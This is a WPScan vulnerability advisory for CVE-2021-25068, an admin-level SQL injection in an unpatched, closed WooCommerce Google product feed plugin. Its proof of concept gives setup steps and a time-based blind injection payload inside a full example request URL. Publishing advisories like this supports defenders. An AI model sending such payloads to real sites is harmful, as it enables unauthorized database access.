WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Sync WooCommerce Product feed to Google Shopping <= 1.2.4 - Admin+ SQLi

Description

The plugin uses the 'feed_id' POST parameter which is not properly sanitized for use in a SQL statement, leading to a SQL injection vulnerability in the admin dashboard

Proof of Concept

Install WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins
Perform initial config for the WooCommerce plugin and create a product
In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
Modify the feed_id parameter with 1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

https://example.com/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

Affects Plugins

exportfeed-for-woocommerce-google-product-feed
No known fix - plugin closed

References

CVE
CVE-2021-25068

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

0xdecafbad

Submitter website
http://vuln.farm
Verified

Yes

WPVDB ID
32799efd-99dc-46dd-8648-e9eb872a0371

Timeline

Publicly Published

2022-03-07 (about 1 years ago)

Added

2022-03-07 (about 1 years ago)

Last Updated

2022-04-08 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin